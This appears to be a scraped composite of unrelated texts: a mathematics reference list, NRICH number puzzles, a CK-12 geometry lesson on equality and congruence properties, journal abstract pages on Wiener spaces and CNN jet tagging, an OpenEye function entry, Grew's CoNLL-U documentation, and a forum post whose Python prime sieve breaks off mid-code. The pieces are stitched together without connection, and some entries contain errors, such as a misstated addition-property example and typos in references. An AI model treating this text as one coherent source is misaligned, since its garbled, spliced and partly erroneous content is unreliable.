[5] S. Conti and C. De Lellis, Sharp upper bounds for a variational problem with singular perturbation, Math. Ann. 338 (2007), 119-146. | MR 2295507 | Zbl 1186.49004
[6] J. Dávila and R. Ignat, Lifting of $BV$ functions with values in $S^1$, C. R. Math. Acad. Sci. Paris 337 (2003) 159-164. | MR 2001127 | Zbl 1046.46026
[7] C. De Lellis, An example in the gradient theory of phase transitions, ESAIM Control Optim. Calc. Var. 7 (2002), 285-289 (electronic). | Numdam | MR 1925030 | Zbl 1037.49010
[8] A. Desimone, S. Müller, R. V. Kohn and F.
Otto, A compactness result in the gradient theory of phase transitions, Proc. Roy. Soc. Edinburgh Sect. A 131 (2001), 833-844. | MR 1854999 | Zbl 0986.49009 [9] N. M. Ercolani, R. Indik, A. C. Newell and T. Passot, The geometry of the phase diffusion equation, J. Nonlinear Sci. 10 (2000), 223-274. | MR 1743400 | Zbl 0981.76087 [10] L. C. Evans, “Partial Differential Equations”, Graduate Studies in Mathematics, Vol. 19, American Mathematical Society, 1998. | MR 2597943 | Zbl 0902.35002 [11] L. C. Evans and R. F. Gariepy, “Measure Theory and Fine Properties of Functions”, Studies in Advanced Mathematics, CRC Press, Boca Raton, FL, 1992. | MR 1158660 | Zbl 0804.28001 [12] D. Gilbarg and N. Trudinger, “Elliptic Partial Differential Equations of Elliptic Type”, 2nd ed., Springer-Verlag, Berlin-Heidelberg, 1983. | MR 737190 | Zbl 0198.14101 [13] E. Giusti, “Minimal Surfaces and Functions of Bounded Variation”, Monographs in Mathematics, Vol. 80, Birkhäuser Verlag, Basel, 1984. | MR 775682 | Zbl 0545.49018 [14] W. Jin and R.V. Kohn, Singular perturbation and the energy of folds, J. Nonlinear Sci. 10 (2000), 355-390. | MR 1752602 | Zbl 0973.49009 [15] A. Poliakovsky, A method for establishing upper bounds for singular perturbation problems, C. R. Math. Acad. Sci. Paris 341 (2005), 97-102. | MR 2153964 | Zbl 1068.49009 [16] A. Poliakovsky, Upper bounds for singular perturbation problems involving gradient fields, J. Eur. Math. Soc. 9 (2007), 1-43. | MR 2283101 | Zbl 1241.49011 [17] A. Poliakovsky, A general technique to prove upper bounds for singular perturbation problems, submitted to Journal d'Analyse. | Zbl 1153.49018 [18] T. Rivière and S. Serfaty, Limiting domain wall energy for a problem related to micromagnetics, Comm. Pure Appl. Math. 54 (2001), 294-338. | MR 1809740 | Zbl 1031.35142 [19] T. Rivière and S. Serfaty, Compactness, kinetic formulation and entropies for a problem related to mocromagnetics, Comm. Partial Differential Equations 28 (2003), 249-269. | MR 1974456 | Zbl 1094.35125 [20] A. I. Volpert and S. I. Hudjaev, “Analysis in Classes of Discontinuous Functions and Equations of Mathematical Physics”, Martinus Nijhoff Publishers, Dordrecht, 1985. | MR 785938 | Zbl 0564.46025
### Ab Surd Ity Find the value of sqrt(2+sqrt3)-sqrt(2-sqrt3)and then of cuberoot(2+sqrt5)+cuberoot(2-sqrt5). ### Em'power'ed Find the smallest numbers a, b, and c such that: a^2 = 2b^3 = 3c^5 What can you say about other solutions to this problem? ### Route to Root A sequence of numbers x1, x2, x3, ... starts with x1 = 2, and, if you know any term xn, you can find the next term xn+1 using the formula: xn+1 = (xn + 3/xn)/2 . Calculate the first six terms of this sequence. What do you notice? Calculate a few more terms and find the squares of the terms. Can you prove that the special property you notice about this sequence will apply to all the later terms of the sequence? Write down a formula to give an approximation to the cube root of a number and test it for the cube root of 3 and the cube root of 8. How many terms of the sequence do you have to take before you get the cube root of 8 correct to as many decimal places as your calculator will give? What happens when you try this method for fourth roots or fifth roots etc.? # Weekly Challenge 16: Archimedes Numerical Roots ##### Stage: 5 Challenge Level: A sequence of numbers $x_1, x_2, x_3, ... ,$ starts with $x_1 = 2$, and, if you know any term $x_n$, you can find the next term $x_{n+1}$ using the formula $x_{n+1} = \frac{1}{2} \left( x_n + \frac{3}{x_n} \right)$.
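A quick numerical sketch of the recurrence in the challenge (my own illustration; the cube-root recurrence shown is the standard Newton iteration for $x^3=a$, offered as one possible answer, not necessarily the intended one):

```python
def sqrt_iter(a, x0=2.0, n=6):
    """Iterate x -> (x + a/x)/2, which converges to sqrt(a)."""
    x = x0
    for _ in range(n):
        x = (x + a / x) / 2
        print(x)
    return x

def cbrt_iter(a, x0=2.0, n=6):
    """Newton's method for x**3 = a: x -> (2*x + a/x**2)/3, converging to a**(1/3)."""
    x = x0
    for _ in range(n):
        x = (2 * x + a / x**2) / 3
    return x

sqrt_iter(3)          # printed terms approach 1.7320508... = sqrt(3)
print(cbrt_iter(8))   # approaches 2.0
```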
<img src="https://d5nxst8fruw4z.cloudfront.net/atrk.gif?account=iA1Pi1a8Dy00ym" style="display:none" height="1" width="1" alt="" /> You are reading an older version of this FlexBook® textbook: CK-12 Geometry - Second Edition Go to the latest version. 2.4: Algebraic and Congruence Properties Difficulty Level: At Grade Created by: CK-12 Learning Objectives • Understand basic properties of equality and congruence. • Solve equations and justify each step in the solution. • Use a 2-column format to prove theorems. Review Queue Solve the following problems. 1. Explain how you would solve $2x-3=9$. 2. If two angles are a linear pair, they are supplementary. If two angles are supplementary, their sum is $180^\circ$. What can you conclude? By which law? 3. Draw a picture with the following: $\angle LMN \ \text{is bisected by}\ \overline{MO} \qquad \qquad \overline{LM} \cong \overline{MP}\!\\\angle OMP \ \text{is bisected by}\ \overline{MN} \qquad \qquad N \ \text{is the midpoint of}\ \overline{MQ}$ Know What? Three identical triplets are sitting next to each other. The oldest is Sara and she always tells the truth. The next oldest is Sue and she always lies. Sally is the youngest of the three. She sometimes lies and sometimes tells the truth. Scott came over one day and didn't know who was who, so he asked each of them one question. Scott asked the sister that was sitting on the left, “Which sister is in the middle?” and the answer he received was, “That's Sara.” Scott then asked the sister in the middle, “What is your name?” The response given was, “I'm Sally.” Scott turned to the sister on the right and asked, “Who is in the middle?” The sister then replied, “She is Sue.” Who was who? Properties of Equality Recall from Chapter 1 that the = sign and the word “equality” are used with numbers. The basic properties of equality were introduced to you in Algebra I. Here they are again: For all real numbers $a, b$, and $c$: Examples Reflexive Property of Equality $a = a$ $25 = 25$ Symmetric Property of Equality $a = b$ and $b = a$ $m \angle P = 90^\circ$ or $90^\circ = m \angle P$ Transitive Property of Equality $a = b$ and $b = c$, then $a = c$ $a + 4 = 10$ and $10 = 6 + 4$, then $a + 4 = 6 + 4$ Substitution Property of Equality If $a = b$, then $b$ can be used in place of $a$ and vise versa. If $a = 9$ and $a - c = 5$, then $9 - c = 5$ Addition Property of Equality If $a = b$, then $a + c = b + c$. If $2x = 6$, then $2x + 5 = 6 + 11$ Subtraction Property of Equality If $a = b$, then $a - c = b - c$. If $m \angle x + 15^\circ = 65^\circ$, then $m \angle x+15^\circ-15^\circ=65^\circ-15^\circ$ Multiplication Property of Equality If $a = b$, then $ac = bc$. If $y = 8$, then $5 \cdot y=5 \cdot 8$ Division Property of Equality If $a = b$, then $\frac{a}{c}=\frac{b}{c}$. If $3b=18$, then $\frac{3b}{3}=\frac{18}{3}$ Distributive Property $a(b+c)=ab+ac$ $5(2x-7)=5(2x)-5(7)=10x-35$ Properties of Congruence Recall that $\overline{AB} \cong \overline{CD}$ if and only if $AB = CD$. $\overline{AB}$ and $\overline{CD}$ represent segments, while $AB$ and $CD$ are lengths of those segments, which means that $AB$ and $CD$ are numbers. The properties of equality apply to $AB$ and $CD$. This also holds true for angles and their measures. $\angle ABC \cong \angle DEF$ if and only if $m \angle ABC = m \angle DEF$. Therefore, the properties of equality apply to $m \angle ABC$ and $m \angle DEF$. Just like the properties of equality, there are properties of congruence. These properties hold for figures and shapes. 
For Line Segments For Angles Reflexive Property of Congruence $\overline{AB} \cong \overline{AB}$ $\angle ABC \cong \angle CBA$ Symmetric Property of Congruence If $\overline{AB} \cong \overline{CD}$, then $\overline{CD} \cong \overline{AB}$ If $\angle ABC \cong \angle DEF$, then $\angle DEF \cong \angle ABC$ Transitive Property of Congruence If $\overline{AB} \cong \overline{CD}$ and $\overline{CD} \cong \overline{EF}$, then $\overline{AB} \cong \overline{EF}$ If $\angle ABC \cong \angle DEF$ and $\angle DEF \cong \angle GHI$, then $\angle ABC \cong \angle GHI$ Using Properties of Equality with Equations When you solve equations in algebra you use properties of equality. You might not write out the logical justification for each step in your solution, but you should know that there is an equality property that justifies that step. We will abbreviate “Property of Equality” “PoE” and “Property of Congruence” “PoC.” Example 1: Solve $2(3x-4)+11=x-27$ and justify each step. Solution: $2(3x-4)+11 &= x-27\\6x-8+11 &= x-27 && \text{Distributive Property}\\6x+3 &= x-27 && \text{Combine like terms}\\6x+3-3 &= x-27-3 && \text{Subtraction PoE}\\6x &= x-30 && \text{Simplify}\\6x-x &= x-x-30 && \text{Subtraction PoE}\\5x &= -30 && \text{Simplify}\\\frac{5x}{5} &= \frac{-30}{5} && \text{Division PoE}\\x &= -6 && \text{Simplify}$ Example 2: Given points $A, B$, and $C$, with $AB = 8, BC = 17$, and $AC = 20$. Are $A, B$, and $C$ collinear? Solution: Set up an equation using the Segment Addition Postulate. $AB + BC &= AC && \text{Segment Addition Postulate}\\8 + 17 &= 20 && \text{Substitution PoE}\\25 & \neq 20 && \text{Combine like terms}$ Because the two sides are not equal, $A, B$ and $C$ are not collinear. Example 3: If $m \angle A+m \angle B=100^\circ$ and $m \angle B = 40^\circ$, prove that $\angle A$ is an acute angle. Solution: We will use a 2-column format, with statements in one column and their corresponding reasons in the next. This is formally called a 2-column proof. Statement Reason 1. $m \angle A+m \angle B=100^\circ$ and $m \angle B = 40^\circ$ Given (always the reason for using facts that are told to us in the problem) 2. $m \angle A+40^\circ=100^\circ$ Substitution PoE 3. $m \angle A = 60^\circ$ Subtraction PoE 4. $\angle A$ is an acute angle Definition of an acute angle, $m \angle A < 90^\circ$ Two-Column Proof Example 4: Write a two-column proof for the following: If $A, B, C$, and $D$ are points on a line, in the given order, and $AB = CD$, then $AC = BD$. Solution: First of all, when the statement is given in this way, the “if” part is the given and the “then” part is what we are trying to prove. Plot the points in the order $A, B, C, D$ on a line. Add the corresponding markings, $AB = CD$, to the line. Draw the 2-column proof and start with the given information. From there, we can use deductive reasoning to reach the next statement and what we want to prove. Reasons will be definitions, postulates, properties and previously proven theorems. Statement Reason 1. $A, B, C$, and $D$ are collinear, in that order. Given 2. $AB = CD$ Given 3. $BC = BC$ Reflexive PoE 4. $AB + BC = BC + CD$ Addition PoE 5. $AB + BC = AC\!\\BC + CD = BD$ Segment Addition Postulate 6. $AC = BD$ Substitution or Transitive PoE When you reach what it is that you wanted to prove, you are done. Prove Move: (A subsection that will help you with proofs throughout the book.) When completing a proof, a few things to keep in mind: • Number each step. 
• Statements with the same reason can (or cannot) be combined into one step. It is up to you. For example, steps 1 and 2 above could have been one step. And, in step 5, the two statements could have been written separately. • Draw a picture and mark it with the given information. • You must have a reason for EVERY statement. • The order of the statements in the proof is not fixed. For example, steps 3, 4, and 5 could have been interchanged and it would still make sense. Example 5: Write a two-column proof. Given: $\overrightarrow{BF}$ bisects $\angle ABC$; $\angle ABD \cong \angle CBE$ Prove: $\angle DBF \cong \angle EBF$ Solution: First, put the appropriate markings on the picture. Recall, that bisect means “to cut in half.” Therefore, if $\overrightarrow{BF}$ bisects $\angle ABC$, then $m \angle ABF=m \angle FBC$. Also, because the word “bisect” was used in the given, the definition will probably be used in the proof. Statement Reason 1. $\overrightarrow{BF}$ bisects $\angle ABC, \angle ABD \cong \angle CBE$ Given 2. $m \angle ABF=m \angle FBC$ Definition of an Angle Bisector 3. $m \angle ABD=m \angle CBE$ If angles are $\cong$, then their measures are equal. 4. $m \angle ABF=m \angle ABD+m \angle DBF\!\\m \angle FBC=m \angle EBF+m \angle CBE$ Angle Addition Postulate 5. $m \angle ABD+m \angle DBF=m \angle EBF+m \angle CBE$ Substitution PoE 6. $m \angle ABD+m \angle DBF=m \angle EBF+m \angle ABD$ Substitution PoE 7. $m \angle DBF=m \angle EBF$ Subtraction PoE 8. $\angle DBF \cong \angle EBF$ If measures are equal, the angles are $\cong$. Prove Move: Use symbols and abbreviations for words within proofs. For example, $\cong$ was used in place of the word congruent above. You could also use $\angle$ for the word angle. Know What? Revisited The sisters, in order are: Sally, Sue, Sara. The sister on the left couldn’t have been Sara because that sister lied. The middle one could not be Sara for the same reason. So, the sister on the right must be Sara, which means she told Scott the truth and Sue is in the middle, leaving Sally to be the sister on the left. Review Questions For questions 1-8, solve each equation and justify each step. 1. $3x+11=-16$ 2. $7x-3=3x-35$ 3. $\frac{2}{3} g+1=19$ 4. $\frac{1}{2} MN=5$ 5. $5m \angle ABC=540^\circ$ 6. $10b-2(b+3)=5b$ 7. $\frac{1}{4}y+\frac{5}{6}=\frac{1}{3}$ 8. $\frac{1}{4}AB+\frac{1}{3}AB=12+\frac{1}{2}AB$ For questions 9-14, use the given property or properties of equality to fill in the blank. $x, y$, and $z$ are real numbers. 1. Symmetric: If $x = 3$, then _________. 2. Distributive: If $4(3x - 8)$, then _________. 3. Transitive: If $y = 12$ and $x = y$, then _________. 4. Symmetric: If $x + y = y + z$, then _________. 5. Transitive: If $AB = 5$ and $AB = CD$, then _________. 6. Substitution: If $x = y - 7$ and $x = z + 4$, then _________. 7. Given points $E, F$, and $G$ and $EF = 16$, $FG = 7$ and $EG = 23$. Determine if $E, F$ and $G$ are collinear. 8. Given points $H, I$ and $J$ and $HI = 9, IJ = 9$ and $HJ = 16$. Are the three points collinear? Is $I$ the midpoint? 9. If $m \angle KLM = 56^\circ$ and $m \angle KLM + m \angle NOP = 180^\circ$, explain how $\angle NOP$ must be an obtuse angle. Fill in the blanks in the proofs below. 1. Given: $\angle ABC \cong DEF\!\\\angle GHI \cong \angle JKL$ $\;$ Prove: $m \angle ABC + m \angle GHI = m \angle DEF + m \angle JKL$ Statement Reason 1. Given 2. $m \angle ABC = m \angle DEF\\m \angle GHI = m \angle JKL$ 4. $m \angle ABC + m \angle GHI = m \angle DEF + m \angle JKL$ 1. 
Given: $M$ is the midpoint of $\overline{AN}$. $N$ is the midpoint $\overline{MB}$ Prove: $AM = NB$ Statement Reason 1. Given 2. Definition of a midpoint 3. $AM = NB$ Use the diagram to answer questions 20-25. 1. Name a right angle. 2. Name two perpendicular lines. 3. Given that $EF = GH$, is $EG = FH$ true? Explain your answer. 4. Is $\angle CGH$ a right angle? Why or why not? 5. Using what is given in the picture AND $\angle EBF \cong \angle HCG$, prove $\angle ABF \cong \angle DCG$. Write a two-column proof. 6. Using what is given in the picture AND $AB = CD$, prove $AC = BD$. Write a two-column proof. Use the diagram to answer questions 26-32. Which of the following must be true from the diagram? Take each question separately, they do not build upon each other. 1. $\overline{AD} \cong \overline{BC}$ 2. $\overline{AB} \cong \overline{CD}$ 3. $\overline{CD} \cong \overline{BC}$ 4. $\overline{AB} \bot \overline{AD}$ 5. $ABCD$ is a square 6. $\overline{AC}$ bisects $\angle DAB$ 7. Write a two-column proof. Given: Picture above and $\overline{AC}$ bisects $\angle DAB$ Prove: $m \angle BAC = 45^\circ$ 8. Draw a picture and write a two-column proof. Given: $\angle 1$ and $\angle 2$ form a linear pair and $m \angle 1=m \angle 2$. Prove: $\angle 1$ is a right angle 1. First, subtract 3 from both sides and then divide both sides by 2. $x = 3$ 2. If 2 angles are a linear pair, then their sum is $180^\circ$. Law of Syllogism. Feb 23, 2012 Oct 07, 2015
# American Institute of Mathematical Sciences

June 2010, 28(2): 591-606. doi: 10.3934/dcds.2010.28.591

## Sets with finite perimeter in Wiener spaces, perimeter measure and boundary rectifiability

1 Scuola Normale Superiore, p.za dei Cavalieri 7, Pisa, I-56126
2 Dipartimento di Matematica, Università di Ferrara, via Machiavelli 35, Ferrara, I-44121, Italy
3 Dipartimento di Matematica "Ennio De Giorgi", Università del Salento, C.P. 193, Lecce, I-73100, Italy

Received January 2010. Revised April 2010. Published April 2010.

We discuss some recent developments of the theory of $BV$ functions and sets of finite perimeter in infinite-dimensional Gaussian spaces. In this context the concepts of Hausdorff measure, approximate continuity, rectifiability have to be properly understood. After recalling the known facts, we prove a Sobolev-rectifiability result and we list some open problems.

Citation: Luigi Ambrosio, Michele Miranda jr., Diego Pallara. Sets with finite perimeter in Wiener spaces, perimeter measure and boundary rectifiability. Discrete & Continuous Dynamical Systems - A, 2010, 28 (2) : 591-606. doi: 10.3934/dcds.2010.28.591
A note on Erdős-Ko-Rado sets of generators in Hermitian polar spaces. Advances in Mathematics of Communications, 2016, 10 (3) : 541-545. doi: 10.3934/amc.2016024 [13] Liangwei Wang, Jingxue Yin, Chunhua Jin. $\omega$-limit sets for porous medium equation with initial data in some weighted spaces. Discrete & Continuous Dynamical Systems - B, 2013, 18 (1) : 223-236. doi: 10.3934/dcdsb.2013.18.223 [14] Annibale Magni, Matteo Novaga. A note on non lower semicontinuous perimeter functionals on partitions. Networks & Heterogeneous Media, 2016, 11 (3) : 501-508. doi: 10.3934/nhm.2016006 [15] Annalisa Cesaroni, Matteo Novaga. Volume constrained minimizers of the fractional perimeter with a potential energy. Discrete & Continuous Dynamical Systems - S, 2017, 10 (4) : 715-727. doi: 10.3934/dcdss.2017036 [16] Serena Dipierro, Alessio Figalli, Giampiero Palatucci, Enrico Valdinoci. Asymptotics of the $s$-perimeter as $s\searrow 0$. Discrete & Continuous Dynamical Systems - A, 2013, 33 (7) : 2777-2790. doi: 10.3934/dcds.2013.33.2777 [17] Peter Müller, Gábor P. Nagy. On the non-existence of sharply transitive sets of permutations in certain finite permutation groups. Advances in Mathematics of Communications, 2011, 5 (2) : 303-308. doi: 10.3934/amc.2011.5.303 [18] Tanja Eisner, Pavel Zorin-Kranich. Uniformity in the Wiener-Wintner theorem for nilsequences. Discrete & Continuous Dynamical Systems - A, 2013, 33 (8) : 3497-3516. doi: 10.3934/dcds.2013.33.3497 [19] B. S. Lee, Arif Rafiq. Strong convergence of an implicit iteration process for a finite family of Lipschitz $\phi -$uniformly pseudocontractive mappings in Banach spaces. Numerical Algebra, Control & Optimization, 2014, 4 (4) : 287-293. doi: 10.3934/naco.2014.4.287 [20] Viorel Barbu, Ionuţ Munteanu. Internal stabilization of Navier-Stokes equation with exact controllability on spaces with finite codimension. Evolution Equations & Control Theory, 2012, 1 (1) : 1-16. doi: 10.3934/eect.2012.1.1 2018 Impact Factor: 1.143
# OENetCharge

int OENetCharge(const OEMolBase &mol)

Determines the net charge on a molecule. If the molecule has partial charges specified (see OEChem's OEHasPartialCharges function), this function returns the sum of the partial charges rounded to an integer. Otherwise, it returns the sum of the formal charges of the atoms in the molecule.
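A minimal usage sketch in Python (assuming the OpenEye Python toolkit is installed and licensed; the SMILES string and variable names are arbitrary illustration, not part of this documentation page):

```python
from openeye import oechem

# Build a molecule from SMILES (acetate anion as an arbitrary example).
mol = oechem.OEGraphMol()
oechem.OESmilesToMol(mol, "CC(=O)[O-]")

# No partial charges have been assigned here, so OENetCharge falls back to
# summing the formal charges: -1 for this molecule.
print(oechem.OENetCharge(mol))

# OEHasPartialCharges reports whether partial charges are present.
print(oechem.OEHasPartialCharges(mol))
```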
## Tag Z boson jets via convolutional neural networks

Li Jing, Sun Hao

School of Physics, Dalian University of Technology, Dalian 116024, China

Corresponding author: Sun Hao, [email protected]

Funds: Project supported by the National Natural Science Foundation of China (Grant Nos. 11675033, 12075043)

#### Abstract

The jet tagging task in high-energy physics is to distinguish signals of interest from the background, which is of great importance for the discovery of new particles, or new processes, at the Large Hadron Collider. The energy deposition generated in the calorimeter can be seen as a kind of picture. Based on this notion, tagging jets initiated by different processes becomes a classic image classification task in the computer vision field. We use jet images, built from high-dimensional low-level information (energy-momentum four-vectors), as the input to explore the potential of convolutional neural networks (CNNs). Four models of different depths are designed to make the best use of the underlying features of jet images. The traditional multivariate method, the boosted decision tree (BDT), is used as a baseline to benchmark the performance of the networks. We introduce four observables into the BDTs: the mass and transverse momentum of the fat jet, the distance between the leading and subleading subjets, and the N-subjettiness. Different numbers of trees are adopted to build three kinds of BDTs, intended to have different classification abilities. After training and testing, the results show that CNN 3 is the most compact and efficient network among the designs based on stacking convolutional layers. Deepening the model can improve the performance to a certain extent, but not in every case. The performances of all BDTs are almost the same, possibly because of the small number of input observables. The performance metrics show that the CNNs outperform the BDTs: the background rejection improves by a factor of about 1.5 at 50% signal efficiency. In addition, after inspecting the best and the worst samples, we summarize the characteristics of jets initiated by different processes: jets from Z boson decays tend to concentrate in the center of the jet image or to have a clearly distinguishable substructure, whereas the substructures of jets from generic quantum chromodynamics processes take more random forms and do not necessarily consist of exactly two subjets. Finally, the confusion matrix of CNN 3 indicates that the classifier tends to be somewhat conservative. Exploring how to balance conservative and aggressive classification is a goal of future work.

Fig. 1. (a) Signal average jet image; (b) background average jet image. $\eta$ and $\phi$ represent pseudo-rapidity and azimuth, respectively.

Fig. 2. Architecture of the CNN 3. This figure was generated by adapting the code from https://github.com/gwding/draw_convnet.

Fig. 3. (a) Mass distribution of fat jets; (b) transverse momentum distribution of fat jets; (c) distribution of the distance between the leading and subleading subjets; (d) distribution of the N-subjettiness ${\tau }_{21}$.

Fig. 4. ROC curves of different models.

Fig. 5. Distribution of the signal neuron of the CNN 3 on signal and background samples.

Fig. 6. The best and the worst signal jet images.

Fig. 7. The best and the worst background jet images.

Fig. 8. Confusion matrix of the CNN 3 on the test set. The true label is on the vertical axis, and the predicted label is on the horizontal axis.

Publication history: Received 18 September 2020; revised 13 November 2020; published online 6 March 2021; issue published 20 March 2021.
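The abstract does not spell out the exact layer configuration of CNN 3, so the following is only a rough sketch of the kind of jet-image classifier it describes: a few stacked convolutional blocks over a single-channel calorimeter image, ending in a two-class (signal/background) output. The 33×33 image size, channel widths, and kernel sizes are assumptions for illustration, not values taken from the paper.

```python
import torch
import torch.nn as nn

class JetImageCNN(nn.Module):
    """Toy jet-image classifier: stacked conv blocks plus a small dense head.
    The 33x33 single-channel input and all layer widths are illustrative guesses."""
    def __init__(self):
        super().__init__()
        self.features = nn.Sequential(
            nn.Conv2d(1, 32, kernel_size=3, padding=1), nn.ReLU(), nn.MaxPool2d(2),
            nn.Conv2d(32, 64, kernel_size=3, padding=1), nn.ReLU(), nn.MaxPool2d(2),
            nn.Conv2d(64, 64, kernel_size=3, padding=1), nn.ReLU(),
        )
        self.head = nn.Sequential(
            nn.Flatten(),
            nn.Linear(64 * 8 * 8, 128), nn.ReLU(),
            nn.Linear(128, 2),  # signal (Z-boson jet) vs. background (QCD jet)
        )

    def forward(self, x):
        return self.head(self.features(x))

# A batch of 4 fake 33x33 jet images, just to check tensor shapes.
model = JetImageCNN()
logits = model(torch.randn(4, 1, 33, 33))
print(logits.shape)  # torch.Size([4, 2])
```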
CoNLL-U format

The most common way to store dependency structures is the CoNLL format. Several extensions were proposed, and we describe here the one used by Grew, known as the CoNLL-U format, defined in the Universal Dependencies project.

For a sentence, some metadata are given in lines beginning with #. The remaining lines describe the tokens of the structure. Token lines contain 10 fields, separated by tabulations. The file n01118003.conllu is an example of CoNLL-U data taken from the corpus UD_English-PUD (version 2.6).

# newdoc id = n01118
# sent_id = n01118003
# text = Drop the mic.
1   Drop   drop   VERB   VB   VerbForm=Inf                0   root    0:root    _
2   the    the    DET    DT   Definite=Def|PronType=Art   3   det     3:det     _
3   mic    mic    NOUN   NN   Number=Sing                 1   obj     1:obj     SpaceAfter=No
4   .      .      PUNCT  .    _                           1   punct   1:punct   _

We explain here how Grew deals with the 10 fields of CoNLL-U files:

1. ID. This field is a number used as an identifier for the corresponding lexical unit (LU).
2. FORM. The phonological form of the LU. In Grew, the value of this field is available through a feature named form (for backward compatibility, the keyword phon can also be used instead of form).
3. LEMMA. The lemma of the LU. In Grew, this corresponds to the feature lemma.
4. UPOS. The universal part-of-speech tag. In Grew, this corresponds to the feature upos (for backward compatibility, cat can also be used to refer to this field).
5. XPOS. The language-specific part-of-speech tag. In Grew, this corresponds to the feature xpos (for backward compatibility, pos can also be used to refer to this field).
6. FEATS. List of morphological features.
7. HEAD. Head of the current word, which is either a value of ID or 0 for the root node.
8. DEPREL. Dependency relation to the HEAD (root iff HEAD = 0).
9. DEPS. (UD only) Enhanced dependency graph in the form of a list of head-deprel pairs. In Grew, these relations are encoded with the feature enhanced=yes.
10. MISC. Any other annotation. In Grew, annotations of this field are accessible like morphological features of the FEATS column.

Note that the same format is very often used to describe dependency syntax corpora. In these cases, a set of sentences is described in the same file, using the same convention as above and a blank line as separator between sentences. It is also required that the sent_id metadata be unique for each sentence in the file.

In practice, it may be useful to deal explicitly with the root relation (for instance, if some rewriting rule is designed to change the root of the structure). To allow this, when reading the CoNLL-U format, Grew also creates a node at position 0 and links it with the root relation to the linguistic root node of the sentence. The example above then produces the 5-node graph below:

In Grew nodes, fields 2, 3, 4 and 5 of the CoNLL-U structure are considered as features with the following feature names.

| CoNLL-U field | 2 | 3 | 4 | 5 |
|---|---|---|---|---|
| Name | form | lemma | upos | xpos |

For instance:

• matching the word is: pattern { N [form="is"] }
• matching the lemma be: pattern { N [lemma="be"] }

In older versions of Grew (before the definition of the CoNLL-U format), fields 2, 4 and 5 were accessible with the names phon, cat and pos respectively. To provide backward compatibility and uniform handling of these fields, the names phon, cat and pos are replaced at parsing time by form, upos and xpos. As a consequence, it is impossible to use both phon and form in the same system. We highly recommend using only the form feature in this setting. Of course, the same observation applies to cat and upos (upos should be preferred) and to pos and xpos (xpos should be preferred).
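As a quick illustration of the 10-field layout (not part of the Grew documentation itself), a minimal Python sketch that splits one token line into named fields might look like this; the field names follow the list above.

```python
# Minimal CoNLL-U token-line parser (illustrative sketch, not Grew's own code).
FIELDS = ["ID", "FORM", "LEMMA", "UPOS", "XPOS",
          "FEATS", "HEAD", "DEPREL", "DEPS", "MISC"]

def parse_token_line(line):
    """Split one tab-separated token line into a dict of the 10 CoNLL-U fields."""
    values = line.rstrip("\n").split("\t")
    if len(values) != 10:
        raise ValueError(f"expected 10 fields, got {len(values)}")
    return dict(zip(FIELDS, values))

token = parse_token_line("3\tmic\tmic\tNOUN\tNN\tNumber=Sing\t1\tobj\t1:obj\tSpaceAfter=No")
print(token["FORM"], token["HEAD"], token["DEPREL"])   # mic 1 obj
```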
Additional features textform and wordform

In order to deal with the several places where the text data present in the original sentence and the corresponding linguistic unit are different, a systematic use of the two features textform and wordform was proposed in #683. The two fields are built from CoNLL-U data in the following way (a small sketch implementing these rules follows below):

1. If a multiword token i-j is declared:
   • the textform of the first token is the FORM field of the multiword token
   • the textform of each other token is _
2. If the token is an empty node (exists only in EUD): textform=_ and wordform=__EMPTY__
3. For each token without a textform feature, the textform is set to the FORM field value
4. For each token without a wordform feature, the wordform is set to the FORM field value

⚠️ In places where the wordform should be different from the FORM field, this should be expressed in the data with an explicit wordform feature. This includes:
• the lowercased form of the initial word (or potentially other words in the sentence)
• typographical or orthographical errors
• tokens linked by a goeswith relation

See a few examples in SUD_French-GSD.
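A minimal sketch of how those four defaulting rules could be applied to a parsed sentence (this is an illustration, not Grew's implementation; tokens are assumed to be dicts like the ones produced by the parser sketched earlier, with multiword tokens carrying a range ID such as 1-2 and empty nodes an ID such as 3.1):

```python
def fill_textform_wordform(tokens):
    """Apply the textform/wordform defaulting rules to a list of token dicts.
    Each dict has at least ID and FORM. Illustrative sketch only."""
    for tok in tokens:
        if "-" in tok["ID"]:                      # rule 1: multiword token i-j
            start, end = map(int, tok["ID"].split("-"))
            span = [t for t in tokens
                    if t["ID"].isdigit() and start <= int(t["ID"]) <= end]
            for k, t in enumerate(span):
                t["textform"] = tok["FORM"] if k == 0 else "_"
    for tok in tokens:
        if "-" in tok["ID"]:
            continue
        if "." in tok["ID"]:                      # rule 2: empty node (EUD only)
            tok["textform"] = "_"
            tok["wordform"] = "__EMPTY__"
        tok.setdefault("textform", tok["FORM"])   # rule 3
        tok.setdefault("wordform", tok["FORM"])   # rule 4
    return tokens

# Example: French "du" = de + le, declared as a multiword token 1-2.
sentence = [
    {"ID": "1-2", "FORM": "du"},
    {"ID": "1", "FORM": "de"},
    {"ID": "2", "FORM": "le"},
    {"ID": "3", "FORM": "chat"},
]
for t in fill_textform_wordform(sentence):
    print(t["ID"], t["FORM"], t.get("textform"), t.get("wordform"))
```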
mersenneforum.org

"Genius" needed to speed up this not-even-a-sieve in Python but he did not succeed

2018-05-16, 18:51   #1
ONeil
Dec 2017
24·3·5 Posts

"Genius" needed to speed up this not-even-a-sieve in Python but he did not succeed

I need help regarding a Mersenne Prime Sieve which I edited to perform this task; this code is from a perfect number generator. The problem is the program slows down at 11213 in python. Can anyone offer some speed enhancements for this sieve in Python? The output starts out like this.

Quote:
2 3 5 7 13 17 19 31 61 89 107 127 521 607 1279 2203 2281 3217 4253 4423 9689 9941 11213

Code:
from itertools import count

def postponed_sieve():                  # postponed sieve, by Will Ness
    yield 2; yield 3; yield 5; yield 7  # original code David Eppstein,
    sieve = {}                          #   Alex Martelli, ActiveState Recipe 2002
    ps = postponed_sieve()              # a separate base Primes Supply:
    p = next(ps) and next(ps)           # (3) a Prime to add to dict
    q = p*p                             # (9) its sQuare
    for c in count(9, 2):               # the Candidate
        if c in sieve:                  # c's a multiple of some base prime
            s = sieve.pop(c)            #     i.e. a composite ; or
        elif c < q:
            yield c                     # a prime
            continue
        else:                           # (c==q): or the next base prime's square:
            s = count(q+2*p, 2*p)       #    (9+6, by 6 : 15,21,27,33,...)
            p = next(ps)                # (5)
            q = p*p                     # (25)
        for m in s:                     # the next multiple
            if m not in sieve:          # no duplicates
                break
        sieve[m] = s                    # original test entry: ideone.com/WFv4f

def prime_sieve():                      # postponed sieve, by Will Ness
    yield 2; yield 3; yield 5; yield 7  # original code David Eppstein,
    sieve = {}                          #   Alex Martelli, ActiveState Recipe 2002
    ps = postponed_sieve()              # a separate base Primes Supply:
    p = next(ps) and next(ps)           # (3) a Prime to add to dict
    q = p*p                             # (9) its sQuare
    for c in count(9, 2):               # the Candidate
